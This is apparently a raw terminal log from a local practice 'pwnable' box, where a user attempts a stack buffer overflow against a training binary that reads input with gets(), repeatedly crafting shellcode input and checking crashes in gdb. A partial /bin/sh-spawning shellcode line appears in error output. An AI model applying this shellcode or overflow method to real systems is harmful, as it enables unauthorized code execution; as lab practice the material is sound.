Untitled

Last login: Fri Feb  3 19:40:13 on ttys003
Rameshs-MacBook-Pro-3:~ Tara$ ssh -p 2222 vsftpd@127.0.0.1
The authenticity of host '[127.0.0.1]:2222 ([127.0.0.1]:2222)' can't be established.
ECDSA key fingerprint is SHA256:0d25HRmF+6QJGKx2XcQDAMcqfc9+rzEmjcM50tev8+c.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '[127.0.0.1]:2222' (ECDSA) to the list of known hosts.
vsftpd@127.0.0.1's password:
                                                        _/        _/
     _/_/_/    _/      _/      _/  _/_/_/      _/_/_/  _/_/_/    _/    _/_/
    _/    _/  _/      _/      _/  _/    _/  _/    _/  _/    _/  _/  _/_/_/_/
   _/    _/    _/  _/  _/  _/    _/    _/  _/    _/  _/    _/  _/  _/
  _/_/_/        _/      _/      _/    _/    _/_/_/  _/_/_/    _/    _/_/_/
 _/
_/

Last login: Thu Jan 28 15:54:38 2016 from 10.0.2.2
vsftpd@pwnable:~$ ls
dejavu  dejavu.c  exploit  README  WELCOME
vsftpd@pwnable:~$ cd dejavu
-bash: cd: dejavu: Not a directory
vsftpd@pwnable:~$ vi dejavu.c
vsftpd@pwnable:~$ vi dejavu
vsftpd@pwnable:~$ cd README
-bash: cd: README: Not a directory
vsftpd@pwnable:~$ vi README
vsftpd@pwnable:~$ vi WELCOME
vsftpd@pwnable:~$ ls -a
.   .bash_history  .cache  dejavu.c  .profile  .ssh      WELCOME
..  .bashrc        dejavu  exploit   README    .viminfo
vsftpd@pwnable:~$ exploit
exploit: command not found
vsftpd@pwnable:~$ vi exploit
vsftpd@pwnable:~$ vi dejavu
vsftpd@pwnable:~$ vi dejavu.c
vsftpd@pwnable:~$ gdb dejavu
GNU gdb (GDB) 7.5-ubuntu
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /home/vsftpd/dejavu...done.
(gdb) r
Starting program: /home/vsftpd/dejavu
fdsafda
[Inferior 1 (process 4235) exited normally]
(gdb)
(gdb)
(gdb)
(gdb) r
Starting program: /home/vsftpd/dejavu

[Inferior 1 (process 4257) exited normally]
(gdb) quit
vsftpd@pwnable:~$ vi dejavu.c
vsftpd@pwnable:~$ invoke -d dejavu
GNU gdb (GDB) 7.5-ubuntu
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /home/vsftpd/dejavu...done.
(gdb) r
Starting program: /home/vsftpd/dejavu
f
[Inferior 1 (process 6235) exited normally]
(gdb) quit
vsftpd@pwnable:~$ ls
dejavu  dejavu.c  exploit  README  WELCOME
vsftpd@pwnable:~$ vi dejavu.c
vsftpd@pwnable:~$ vi exploit
vsftpd@pwnable:~$ vi egg.py
vsftpd@pwnable:~$ ls
dejavu  dejavu.c  egg.py  exploit  README  WELCOME
vsftpd@pwnable:~$ cp ./egg egg.py
cp: cannot stat `./egg': No such file or directory
vsftpd@pwnable:~$ cp egg.py ./egg
vsftpd@pwnable:~$ ls
dejavu  dejavu.c  egg  egg.py  exploit  README  WELCOME
vsftpd@pwnable:~$ ls -a
.   .bash_history  .cache  dejavu.c  egg.py   .profile  .ssh      WELCOME
..  .bashrc        dejavu  egg       exploit  README    .viminfo
vsftpd@pwnable:~$ vi egg
vsftpd@pwnable:~$ vi egg.py
vsftpd@pwnable:~$ vi egg
vsftpd@pwnable:~$ rm egg
vsftpd@pwnable:~$ ls
dejavu  dejavu.c  egg.py  exploit  README  WELCOME
vsftpd@pwnable:~$ ls -a
.   .bash_history  .cache  dejavu.c  exploit   README  .viminfo
..  .bashrc        dejavu  egg.py    .profile  .ssh    WELCOME
vsftpd@pwnable:~$ ls
dejavu  dejavu.c  egg.py  exploit  README  WELCOME
vsftpd@pwnable:~$ ./egg > test
-bash: ./egg: No such file or directory
vsftpd@pwnable:~$ cp egg.py ./egg
vsftpd@pwnable:~$ ls
dejavu  dejavu.c  egg  egg.py  exploit  README  test  WELCOME
vsftpd@pwnable:~$ ./egg > test
-bash: ./egg: Permission denied
vsftpd@pwnable:~$ chmod x egg
chmod: invalid mode: `x'
Try `chmod --help' for more information.
vsftpd@pwnable:~$ chmod +x egg
vsftpd@pwnable:~$ ./egg > test
./egg: line 1: syntax error near unexpected token `('
./egg: line 1: `def main():'
vsftpd@pwnable:~$ python egg
  File "egg", line 2
    shellcode = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07" +
                                                               ^
SyntaxError: invalid syntax
vsftpd@pwnable:~$ vi egg
vsftpd@pwnable:~$ vi egg
vsftpd@pwnable:~$ python egg
  File "egg", line 2
    shellcode = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07" +
                                                               ^
SyntaxError: invalid syntax
vsftpd@pwnable:~$ ./egg > test
./egg: line 1: syntax error near unexpected token `('
./egg: line 1: `def shell():'
vsftpd@pwnable:~$ python2 egg
  File "egg", line 2
    shellcode = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07" +
                                                               ^
SyntaxError: invalid syntax
vsftpd@pwnable:~$ python3 egg
  File "egg", line 2
    shellcode = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07" +
                                                               ^
SyntaxError: invalid syntax
vsftpd@pwnable:~$ ls -a
.   .bash_history  .cache  dejavu.c  egg.py   .profile  .ssh  .viminfo
..  .bashrc        dejavu  egg       exploit  README    test  WELCOME
vsftpd@pwnable:~$ rm egg
vsftpd@pwnable:~$ rm egg.py
vsftpd@pwnable:~$ ls
dejavu  dejavu.c  exploit  README  test  WELCOME
vsftpd@pwnable:~$ ls -a
.   .bash_history  .cache  dejavu.c  .profile  .ssh  .viminfo
..  .bashrc        dejavu  exploit   README    test  WELCOME
vsftpd@pwnable:~$ vi egg.py
vsftpd@pwnable:~$ python egg.py
vsftpd@pwnable:~$ cp egg.py test
vsftpd@pwnable:~$ python test
vsftpd@pwnable:~$ vi egg.py
vsftpd@pwnable:~$ python egg.py
  File "egg.py", line 2
    shellcode = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07" +
                                                                ^
SyntaxError: invalid syntax
vsftpd@pwnable:~$ cp test egg.py
vsftpd@pwnable:~$ python egg.py
vsftpd@pwnable:~$ rm test
vsftpd@pwnable:~$ cp egg.py ./egg
vsftpd@pwnable:~$ ls
dejavu  dejavu.c  egg  egg.py  exploit  README  WELCOME
vsftpd@pwnable:~$ chmod +x egg
vsftpd@pwnable:~$ egg > test
No command 'egg' found, did you mean:
 Command 'eg' from package 'easygit' (universe)
 Command 'ekg' from package 'ekg' (universe)
 Command 'ekg' from package 'ekg-gtk' (universe)
 Command 'eog' from package 'eog' (main)
egg: command not found
vsftpd@pwnable:~$ ./egg > test
./egg: line 1: syntax error near unexpected token `('
./egg: line 1: `def shell():'
vsftpd@pwnable:~$ chmod +x egg.py
vsftpd@pwnable:~$ ls
dejavu  dejavu.c  egg  egg.py  exploit  README  test  WELCOME
vsftpd@pwnable:~$ rm egg
vsftpd@pwnable:~$ ls
dejavu  dejavu.c  egg.py  exploit  README  test  WELCOME
vsftpd@pwnable:~$ ls -a
.   .bash_history  .cache  dejavu.c  exploit   README  test      WELCOME
..  .bashrc        dejavu  egg.py    .profile  .ssh    .viminfo
vsftpd@pwnable:~$ ./egg > test
-bash: ./egg: No such file or directory
vsftpd@pwnable:~$ ./egg.py > test
./egg.py: line 1: syntax error near unexpected token `('
./egg.py: line 1: `def shell():'
vsftpd@pwnable:~$ cp egg.py egg
vsftpd@pwnable:~$ chmod +x egg
vsftpd@pwnable:~$ ./egg > test
./egg: line 1: syntax error near unexpected token `('
./egg: line 1: `def shell():'
vsftpd@pwnable:~$ cat
^C
vsftpd@pwnable:~$ vi egg
vsftpd@pwnable:~$ ls
dejavu  dejavu.c  egg  egg.py  exploit  README  test  WELCOME
vsftpd@pwnable:~$ rm egg
vsftpd@pwnable:~$ rm egg.py
vsftpd@pwnable:~$ ls
dejavu  dejavu.c  exploit  README  test  WELCOME
vsftpd@pwnable:~$ rm test
vsftpd@pwnable:~$ ls
dejavu  dejavu.c  exploit  README  WELCOME
vsftpd@pwnable:~$ ls -a
.   .bash_history  .cache  dejavu.c  .profile  .ssh      WELCOME
..  .bashrc        dejavu  exploit   README    .viminfo
vsftpd@pwnable:~$ vi egg
vsftpd@pwnable:~$ python egg
vsftpd@pwnable:~$ vi egg
vsftpd@pwnable:~$ python egg
vsftpd@pwnable:~$ vi egg.
vsftpd@pwnable:~$ ls
dejavu  dejavu.c  egg  exploit  README  WELCOME
vsftpd@pwnable:~$ vi egg
vsftpd@pwnable:~$ python egg
?^?1??F?F
         ?
          ???V
              ̀1ۉ?@̀?????/bin/sh
vsftpd@pwnable:~$ ls
dejavu  dejavu.c  egg  exploit  README  WELCOME
vsftpd@pwnable:~$ chmod +x egg
vsftpd@pwnable:~$ ls
dejavu  dejavu.c  egg  exploit  README  WELCOME
vsftpd@pwnable:~$ ./egg > test
./egg: line 1: syntax error near unexpected token `('
./egg: line 1: `def main():'
vsftpd@pwnable:~$ egg > test
No command 'egg' found, did you mean:
 Command 'eg' from package 'easygit' (universe)
 Command 'ekg' from package 'ekg' (universe)
 Command 'ekg' from package 'ekg-gtk' (universe)
 Command 'eog' from package 'eog' (main)
egg: command not found
vsftpd@pwnable:~$ ./egg > test
./egg: line 1: syntax error near unexpected token `('
./egg: line 1: `def main():'
vsftpd@pwnable:~$ vi egg
vsftpd@pwnable:~$ ls
dejavu  dejavu.c  egg  exploit  README  test  WELCOME
vsftpd@pwnable:~$ vi egg
vsftpd@pwnable:~$ ./egg > test
vsftpd@pwnable:~$ invoke -d dejavu
GNU gdb (GDB) 7.5-ubuntu
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /home/vsftpd/dejavu...done.
(gdb) disas
No frame selected.
(gdb) disas main
Dump of assembler code for function main:
   0x0804841f <+0>:	push   %ebp
   0x08048420 <+1>:	mov    %esp,%ebp
   0x08048422 <+3>:	and    $0xfffffff0,%esp
   0x08048425 <+6>:	call   0x804840c <deja_vu>
   0x0804842a <+11>:	mov    $0x0,%eax
   0x0804842f <+16>:	leave
   0x08048430 <+17>:	ret
End of assembler dump.
(gdb) quit
vsftpd@pwnable:~$ ls
dejavu  dejavu.c  egg  exploit  README  test  WELCOME
vsftpd@pwnable:~$ vi dejavu.c
vsftpd@pwnable:~$ vi dejavu.c
vsftpd@pwnable:~$ invoke -d dejavu
GNU gdb (GDB) 7.5-ubuntu
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /home/vsftpd/dejavu...done.
(gdb) run hellohello
Starting program: /home/vsftpd/dejavu hellohello
^C
Program received signal SIGINT, Interrupt.
0xb7fdd424 in __kernel_vsyscall ()
(gdb) quit
A debugging session is active.

	Inferior 1 [process 9307] will be killed.

Quit anyway? (y or n) y
vsftpd@pwnable:~$ vi egg
vsftpd@pwnable:~$ !i
invoke -d dejavu
GNU gdb (GDB) 7.5-ubuntu
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /home/vsftpd/dejavu...done.
(gdb) b main
Breakpoint 1 at 0x8048425: file dejavu.c, line 12.
(gdb) r
Starting program: /home/vsftpd/dejavu

Breakpoint 1, main () at dejavu.c:12
12	  deja_vu();
(gdb) c
Continuing.
^C
Program received signal SIGINT, Interrupt.
0xb7fdd424 in __kernel_vsyscall ()
(gdb) r hello
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/vsftpd/dejavu hello

Breakpoint 1, main () at dejavu.c:12
12	  deja_vu();
(gdb) n
hello
13	  return 0;
(gdb) b deja_vu
Breakpoint 2 at 0x8048412: file dejavu.c, line 7.
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/vsftpd/dejavu hello

Breakpoint 1, main () at dejavu.c:12
12	  deja_vu();
(gdb) n

Breakpoint 2, deja_vu () at dejavu.c:7
7	  gets(door);
(gdb) n
hellohellohellohello
8	}
(gdb) n
0x08048400 in frame_dummy ()
(gdb) n
Single stepping until exit from function frame_dummy,
which has no line number information.
0x08048380 in register_tm_clones ()
(gdb) n
Single stepping until exit from function register_tm_clones,
which has no line number information.
0x08048440 in __libc_csu_init ()
(gdb) n
Single stepping until exit from function __libc_csu_init,
which has no line number information.
0x080482b0 in _init ()
(gdb) n
Single stepping until exit from function _init,
which has no line number information.
0x08048461 in __libc_csu_init ()
(gdb) n
Single stepping until exit from function __libc_csu_init,
which has no line number information.
0x080483e0 in frame_dummy ()
(gdb) n
Single stepping until exit from function frame_dummy,
which has no line number information.
0x08048380 in register_tm_clones ()
(gdb) n
Single stepping until exit from function register_tm_clones,
which has no line number information.
0x08048492 in __libc_csu_init ()
(gdb) n
Single stepping until exit from function __libc_csu_init,
which has no line number information.
0x00000000 in ?? ()
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x00000000 in ?? ()
(gdb) rm b2
Undefined command: "rm".  Try "help".
(gdb) b
Breakpoint 3 at 0x0
(gdb) d 3
(gdb) d 2
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/vsftpd/dejavu hello

Breakpoint 1, main () at dejavu.c:12
12	  deja_vu();
(gdb) n
hellohellowhatishappening

Program received signal SIGSEGV, Segmentation fault.
0x6e696e65 in ?? ()
(gdb) layout split
vsftpd@pwnable:~$ ./egg > test
vsftpd@pwnable:~$ invoke -d dejavu
GNU gdb (GDB) 7.5-ubuntu
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /home/vsftpd/dejavu...done.
(gdb) b main
Breakpoint 1 at 0x8048425: file dejavu.c, line 12.
(gdb) Run < test
Starting program: /home/vsftpd/dejavu < test

Breakpoint 1, main () at dejavu.c:12
12	  deja_vu();
(gdb) s
deja_vu () at dejavu.c:7
7	  gets(door);
(gdb) layout split
vsftpd@pwnable:~$ ./egg > test
vsftpd@pwnable:~$ invoke -d dejavu
GNU gdb (GDB) 7.5-ubuntu
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /home/vsftpd/dejavu...done.
(gdb) b main
Breakpoint 1 at 0x8048425: file dejavu.c, line 12.
(gdb) Run < test
Starting program: /home/vsftpd/dejavu < test

Breakpoint 1, main () at dejavu.c:12
12	  deja_vu();
(gdb) s
deja_vu () at dejavu.c:7
7	  gets(door);
(gdb) layout split
vsftpd@pwnable:~$ vi dejavu.c
vsftpd@pwnable:~$ git status
The program 'git' is currently not installed. To run 'git' please ask your administrator to install the package 'git'
vsftpd@pwnable:~$ ld
ld: no input files
vsftpd@pwnable:~$ ls
dejavu  dejavu.c  egg  exploit  README  test  WELCOME
vsftpd@pwnable:~$ vi egg
vsftpd@pwnable:~$ ./egg > test
vsftpd@pwnable:~$ invoke -d dejavu
GNU gdb (GDB) 7.5-ubuntu
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /home/vsftpd/dejavu...done.
(gdb) b main
Breakpoint 1 at 0x8048425: file dejavu.c, line 12.
(gdb) Run < test
Starting program: /home/vsftpd/dejavu < test

Breakpoint 1, main () at dejavu.c:12
12	  deja_vu();
(gdb) layout split
vsftpd@pwnable:~$ vi egg
vsftpd@pwnable:~$ ./egg > test
vsftpd@pwnable:~$ !i
invoke -d dejavu
GNU gdb (GDB) 7.5-ubuntu
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /home/vsftpd/dejavu...done.
(gdb) Run < test
Starting program: /home/vsftpd/dejavu < test

Program received signal SIGSEGV, Segmentation fault.
0x895e1feb in ?? ()
(gdb) b main
Breakpoint 1 at 0x8048425: file dejavu.c, line 12.
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/vsftpd/dejavu < test

Breakpoint 1, main () at dejavu.c:12
12	  deja_vu();
(gdb) layout split
vsftpd@pwnable:~$ vi egg
vsftpd@pwnable:~$ !.
./egg > test
vsftpd@pwnable:~$ ./egg > test
vsftpd@pwnable:~$ !i
invoke -d dejavu
GNU gdb (GDB) 7.5-ubuntu
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /home/vsftpd/dejavu...done.
(gdb) r
Starting program: /home/vsftpd/dejavu
^C
Program received signal SIGINT, Interrupt.
0xb7fdd424 in __kernel_vsyscall ()
(gdb) Run < test
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/vsftpd/dejavu < test

Program received signal SIGSEGV, Segmentation fault.
0x895e1feb in ?? ()
(gdb) quit
A debugging session is active.

	Inferior 1 [process 9685] will be killed.

Quit anyway? (y or n) y
vsftpd@pwnable:~$ vi egg
vsftpd@pwnable:~$ vi dejavu
vsftpd@pwnable:~$ vi dejavu.c
vsftpd@pwnable:~$ vi egg
vsftpd@pwnable:~$ ./egg > test
vsftpd@pwnable:~$ invoke -d dejavu
GNU gdb (GDB) 7.5-ubuntu
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /home/vsftpd/dejavu...done.
(gdb) b main
Breakpoint 1 at 0x8048425: file dejavu.c, line 12.
(gdb) Run < test
Starting program: /home/vsftpd/dejavu < test

Breakpoint 1, main () at dejavu.c:12
12	  deja_vu();
(gdb) layout split
vsftpd@pwnable:~$ vi egg
vsftpd@pwnable:~$ ./egg > test
vsftpd@pwnable:~$ !i
invoke -d dejavu
GNU gdb (GDB) 7.5-ubuntu
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /home/vsftpd/dejavu...done.
(gdb) r
Starting program: /home/vsftpd/dejavu
^C
Program received signal SIGINT, Interrupt.
0xb7fdd424 in __kernel_vsyscall ()
(gdb) Run < test
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/vsftpd/dejavu < test

Program received signal SIGSEGV, Segmentation fault.
0x895e1feb in ?? ()
(gdb) quit
A debugging session is active.

	Inferior 1 [process 10126] will be killed.

Quit anyway? (y or n) y
vsftpd@pwnable:~$ vi egg
vsftpd@pwnable:~$ ./egg > test
vsftpd@pwnable:~$ invoke -d dejavu
GNU gdb (GDB) 7.5-ubuntu
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /home/vsftpd/dejavu...done.
(gdb) Run < test
Starting program: /home/vsftpd/dejavu < test

Program received signal SIGSEGV, Segmentation fault.
0x895e1feb in ?? ()
(gdb) ^CQuit
(gdb) quit
A debugging session is active.

	Inferior 1 [process 10251] will be killed.

Quit anyway? (y or n) y
vsftpd@pwnable:~$ ./egg > test
vsftpd@pwnable:~$ vi egg
vsftpd@pwnable:~$ ./egg > test
vsftpd@pwnable:~$ invoke -d dejavu
GNU gdb (GDB) 7.5-ubuntu
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /home/vsftpd/dejavu...done.
(gdb) Run < test
Starting program: /home/vsftpd/dejavu < test

Program received signal SIGSEGV, Segmentation fault.
0x0876895e in ?? ()
(gdb) quit
A debugging session is active.

	Inferior 1 [process 10304] will be killed.

Quit anyway? (y or n) y
vsftpd@pwnable:~$ vi egg
vsftpd@pwnable:~$ ./egg > test
vsftpd@pwnable:~$ invoke -d dejavu
GNU gdb (GDB) 7.5-ubuntu
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /home/vsftpd/dejavu...done.
(gdb) Run < test
Starting program: /home/vsftpd/dejavu < test

Program received signal SIGSEGV, Segmentation fault.
0x88c03108 in ?? ()
(gdb) quit
A debugging session is active.

	Inferior 1 [process 10347] will be killed.

Quit anyway? (y or n) y
vsftpd@pwnable:~$ vi egg
vsftpd@pwnable:~$ ./egg > test
vsftpd@pwnable:~$ invoke -d dejavu
GNU gdb (GDB) 7.5-ubuntu
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /home/vsftpd/dejavu...done.
(gdb) Run < tes
Starting program: /home/vsftpd/dejavu < tes
/bin/sh: 1: cannot open tes: No such file
During startup program exited with code 2.
(gdb) Run < test
Starting program: /home/vsftpd/dejavu < test

Program received signal SIGSEGV, Segmentation fault.
0xeb303936 in ?? ()
(gdb) quit
A debugging session is active.

	Inferior 1 [process 10651] will be killed.

Quit anyway? (y or n) y
vsftpd@pwnable:~$ vi egg
vsftpd@pwnable:~$ ./egg > test
vsftpd@pwnable:~$ invoke -d dejavu
GNU gdb (GDB) 7.5-ubuntu
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /home/vsftpd/dejavu...done.
(gdb) Run < test
Starting program: /home/vsftpd/dejavu < test

Program received signal SIGSEGV, Segmentation fault.
0x895e1feb in ?? ()
(gdb) quit
A debugging session is active.

	Inferior 1 [process 10697] will be killed.

Quit anyway? (y or n) ^[[A^[[A^[[B^[[B^[[By
Please answer y or n.
A debugging session is active.

	Inferior 1 [process 10697] will be killed.

Quit anyway? (y or n) y
vsftpd@pwnable:~$ vi egg
vsftpd@pwnable:~$ ./egg > test
  File "./egg", line 5
SyntaxError: Non-ASCII character '\xc2' in file ./egg on line 5, but no encoding declared; see http://www.python.org/peps/pep-0263.html for details
vsftpd@pwnable:~$ vi egg
vsftpd@pwnable:~$ ./egg > test
vsftpd@pwnable:~$ invoke -d dejavu
GNU gdb (GDB) 7.5-ubuntu
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /home/vsftpd/dejavu...done.
(gdb) Run < test
Starting program: /home/vsftpd/dejavu < test

Program received signal SIGSEGV, Segmentation fault.
0x90f6ffbf in ?? ()
(gdb) quit
A debugging session is active.

	Inferior 1 [process 11158] will be killed.

Quit anyway? (y or n) y
vsftpd@pwnable:~$ vi egg
vsftpd@pwnable:~$ vi egg
vsftpd@pwnable:~$ ./egg > test
vsftpd@pwnable:~$ invoke -d dejavu
GNU gdb (GDB) 7.5-ubuntu
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /home/vsftpd/dejavu...done.
(gdb) Run < test
Starting program: /home/vsftpd/dejavu < test

Program received signal SIGSEGV, Segmentation fault.
0x464646bf in ?? ()
(gdb) quit
A debugging session is active.

	Inferior 1 [process 16061] will be killed.

Quit anyway? (y or n) y
vsftpd@pwnable:~$ vi egg
vsftpd@pwnable:~$ ./egg > test
vsftpd@pwnable:~$ invoke -d dejavu
GNU gdb (GDB) 7.5-ubuntu
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /home/vsftpd/dejavu...done.
(gdb) Run < test
Starting program: /home/vsftpd/dejavu < test

Program received signal SIGSEGV, Segmentation fault.
0xeb303936 in ?? ()
(gdb) quit
A debugging session is active.

	Inferior 1 [process 16606] will be killed.

Quit anyway? (y or n) y
vsftpd@pwnable:~$ vi egg
vsftpd@pwnable:~$ ./egg > test
vsftpd@pwnable:~$ invoke -d dejavu
GNU gdb (GDB) 7.5-ubuntu
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /home/vsftpd/dejavu...done.
(gdb) Run < test
Starting program: /home/vsftpd/dejavu < test

Program received signal SIGSEGV, Segmentation fault.
0xeb303936 in ?? ()
(gdb) b main
Breakpoint 1 at 0x8048425: file dejavu.c, line 12.
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/vsftpd/dejavu < test

Breakpoint 1, main () at dejavu.c:12
12	  deja_vu();
(gdb) layout split
vsftpd@pwnable:~$ vi egg
vsftpd@pwnable:~$ ./egg > test
vsftpd@pwnable:~$ invoke -d dejavu
